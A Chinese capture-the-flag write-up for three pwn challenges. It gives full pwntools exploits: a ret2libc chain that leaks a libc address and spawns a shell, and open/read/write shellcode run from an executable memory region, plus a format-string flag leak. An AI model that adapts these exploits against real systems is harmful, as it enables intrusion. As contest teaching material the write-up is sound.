网络安全竞赛pwn全解及第一道ai的wp
先用ida看看
普通的菜单题。注意第一处比较的是字符 '1'～'4' 而不是整数，所以菜单选项要以字符形式输入；选项 2 存在栈溢出，打 ret2libc 即可。exp 如下:
#!/usr/bin/env python3 |
from pwn import * |
import sys |
from ctypes import * |
#from pwncli import * |
import socks |
# cli_script() |
#from ae64 import AE64 |
#from pymao import * |
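context.log_level = 'debug'
context.arch = 'amd64'
# Challenge binary and the libc it ships with; every libc offset used below
# is only valid for this exact libc build.
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
# libc1 = cdll.LoadLibrary('./libc.so.6')
li = './libc.so.6'
# Optional SOCKS5 proxy, disabled. The published script carried a real
# username/password in plaintext at this spot; they are replaced by
# placeholders here. NOTE(review): a credential that has been published
# this way should be rotated, and supplied via the environment, not the file.
# socks.set_default_proxy(
#     socks.SOCKS5,
#     "81.dart.ccsssc.com",
#     25790,
#     username="<PROXY_USER_PLACEHOLDER>",
#     password="<PROXY_PASS_PLACEHOLDER>",
#     rdns=True,
# )
# socket.socket = socks.socksocket
flag = 1  # 1: talk to the remote instance, 0: run ./pwn locally
if flag:
    p = remote('xt.xl-lab.top', 33662)
else:
    p = process('./pwn')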
# Thin wrappers over the pwntools tube `p` (defined above) and a few
# formatting helpers. Each keeps the original short alias as its name.


def sa(s, n):
    """Send *n* once *s* has been received."""
    return p.sendafter(s, n)


def sla(s, n):
    """Send *n* plus newline once *s* has been received."""
    return p.sendlineafter(s, n)


def sl(s):
    """Send *s* followed by a newline."""
    return p.sendline(s)


def slr(s):
    """Send str(*s*) followed by a newline."""
    return p.sendline(str(s))


def sd(s):
    """Send *s* as-is."""
    return p.send(s)


def sdr(s):
    """Send str(*s*) without a newline."""
    return p.send(str(s))


def rc(n):
    """Receive up to *n* bytes."""
    return p.recv(n)


def ru(s):
    """Receive until *s* is seen."""
    return p.recvuntil(s)


def ti():
    """Hand the tube over to the user."""
    return p.interactive()


def rcl():
    """Receive one line."""
    return p.recvline()


def leak(name, addr):
    """Log *addr* as a hex value labelled *name*."""
    return log.success(name + "--->" + hex(addr))


def u6(a):
    """Receive *a* bytes, zero-pad to 8 and unpack as a u64."""
    raw = rc(a)
    padded = raw.ljust(8, b'\x00')
    # strip() runs after the pad, exactly as in the original: it trims ASCII
    # whitespace at both ends, so a leak ending in b'\n' would again be
    # shorter than 8 bytes when it reaches u64().
    return u64(padded.strip())


def i6(a):
    """Parse a hexadecimal string (with or without 0x) to int."""
    return int(a, 16)
def csu():
    """Return p64(0)+p64(0)+p64(1).

    Presumably the rbx/rbp/r12 seed for a ret2csu chain; it is not called
    anywhere in this exploit.
    """
    words = (0, 0, 1)
    return b''.join(p64(w) for w in words)
def ph(s):
    """Print *s* as a 0x-prefixed hexadecimal number."""
    print(format(s, '#x'))
def dbg():
    """Attach gdb to the live tube `p` and block until the user continues."""
    # context.terminal = ['tmux', 'splitw', '-h']
    # A gdbscript such as 'set debug-file-directory ./star' may be needed
    # for libc symbols.
    gdb.attach(p)
    pause()
# Fixed 0x40xxxx addresses: the binary is non-PIE, so gadget and GOT
# addresses are known without a leak. They belong to this exact build only.
rdi=0x40129a   # presumably a `pop rdi ; ret` gadget (used to load the argument below)
back=0x40136F  # address returned to after the leak so the menu accepts a second payload
ret=0x401410   # a lone `ret`, presumably to keep the stack 16-byte aligned before system()
pu=elf.sym['puts']
puts=elf.got['puts']
sdr(2)  # menu option 2 is the overflowing read (see write-up above)
# 0x58 bytes of filler reach the saved return address; stage 1 calls
# puts(puts@got) to print a libc pointer, then returns to `back`.
pay=0x58*b'b'+flat(rdi,puts,pu,back)
sd(pay)
# Skip the program's own ANSI-coloured "send complete" line so the next
# 6 bytes received are the leaked pointer.
ru(b"\x1B[32m"+"发送完毕。".encode()+b"\x1B[0m\n")
libcbase=u6(6)-libc.sym['puts']
sy=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
# Stage 2: the same overflow, now system("/bin/sh"). A stack canary, PIE or
# full RELRO would each break one step of this chain.
pay=0x58*b'b'+flat(ret,rdi,binsh,sy)
sd(pay)
ph(libcbase)
ti()
异步逃逸
这里ida没识别出来这个mmap64,看汇编
相当于 mmap64(0, 0x2000, 7, 0x22, 0xffffffff, 0)。简单来说就是分配了一段大小为 0x2000、可读可写可执行的匿名内存(第三个参数 prot=7，即 PROT_READ|PROT_WRITE|PROT_EXEC；0x22 是 MAP_PRIVATE|MAP_ANONYMOUS)。后面就简单了:往 v4 写 shellcode 然后跳转过去执行，shellcode 没有任何限制。沙箱允许 ORW，直接用 shellcraft 生成即可。exp 如下:
#!/usr/bin/env python3 |
from pwn import * |
import sys |
from ctypes import * |
#from pwncli import * |
import socks |
# cli_script() |
#from ae64 import AE64 |
#from pymao import * |
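context.log_level = 'debug'
context.arch = 'amd64'
# Challenge binary; only needed here so `asm`/`shellcraft` below pick up
# the right target settings together with context.arch.
elf = ELF('./pwn')
# Optional SOCKS5 proxy, disabled. The published script carried a real
# username/password in plaintext at this spot; they are replaced by
# placeholders here. NOTE(review): a credential that has been published
# this way should be rotated, and supplied via the environment, not the file.
# socks.set_default_proxy(
#     socks.SOCKS5,
#     "81.dart.ccsssc.com",
#     25790,
#     username="<PROXY_USER_PLACEHOLDER>",
#     password="<PROXY_PASS_PLACEHOLDER>",
#     rdns=True,
# )
# socket.socket = socks.socksocket
flag = 1  # 1: talk to the remote instance, 0: run ./pwn locally
if flag:
    p = remote('xt.xl-lab.top', 33583)
else:
    p = process('./pwn')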
# Thin wrappers over the pwntools tube `p` (defined above) and a few
# formatting helpers. Each keeps the original short alias as its name.


def sa(s, n):
    """Send *n* once *s* has been received."""
    return p.sendafter(s, n)


def sla(s, n):
    """Send *n* plus newline once *s* has been received."""
    return p.sendlineafter(s, n)


def sl(s):
    """Send *s* followed by a newline."""
    return p.sendline(s)


def slr(s):
    """Send str(*s*) followed by a newline."""
    return p.sendline(str(s))


def sd(s):
    """Send *s* as-is."""
    return p.send(s)


def sdr(s):
    """Send str(*s*) without a newline."""
    return p.send(str(s))


def rc(n):
    """Receive up to *n* bytes."""
    return p.recv(n)


def ru(s):
    """Receive until *s* is seen."""
    return p.recvuntil(s)


def ti():
    """Hand the tube over to the user."""
    return p.interactive()


def rcl():
    """Receive one line."""
    return p.recvline()


def leak(name, addr):
    """Log *addr* as a hex value labelled *name*."""
    return log.success(name + "--->" + hex(addr))


def u6(a):
    """Receive *a* bytes, zero-pad to 8 and unpack as a u64."""
    raw = rc(a)
    padded = raw.ljust(8, b'\x00')
    # strip() runs after the pad, exactly as in the original: it trims ASCII
    # whitespace at both ends, so a leak ending in b'\n' would again be
    # shorter than 8 bytes when it reaches u64().
    return u64(padded.strip())


def i6(a):
    """Parse a hexadecimal string (with or without 0x) to int."""
    return int(a, 16)
def csu():
    """Return p64(0)+p64(0)+p64(1).

    Presumably the rbx/rbp/r12 seed for a ret2csu chain; it is not called
    anywhere in this exploit.
    """
    words = (0, 0, 1)
    return b''.join(p64(w) for w in words)
def ph(s):
    """Print *s* as a 0x-prefixed hexadecimal number."""
    print(format(s, '#x'))
def dbg():
    """Attach gdb to the live tube `p` and block until the user continues."""
    # context.terminal = ['tmux', 'splitw', '-h']
    # A gdbscript such as 'set debug-file-directory ./star' may be needed
    # for libc symbols.
    gdb.attach(p)
    pause()
# open/read/write shellcode. Per the write-up, the program copies the sent
# bytes into the mapping it created with prot=7 (RWX) and jumps to them; that
# writable+executable mapping is the root cause, and a W^X policy would stop
# this stage entirely. read(3, ...) assumes the flag file becomes fd 3, i.e.
# no other descriptor is open. 0x4AD2BC is a scratch buffer address inside
# this binary; presumably writable data — confirm before reusing elsewhere.
pay=asm(shellcraft.open(b'./flag',0))+asm(shellcraft.read(3,0x4AD2BC,0x100))+asm(shellcraft.write(1,0x4AD2BC,0x100))
sd(pay)
ti()
蜜雪冰城
前面的没啥意思不看了,直接看漏洞点
这里首先把flag写到栈上了,然后有格式化字符串漏洞,看后面可以知道是在会员的积分那里有格式化字符串漏洞。直接%p读出来flag的信息,再用cyberchef的大端转化成小端和hex转字符串就可以读出来flag了。就演示第一段吧,虽然是web,但漏洞还是一样的。
从%8$p一直读到13就可以了
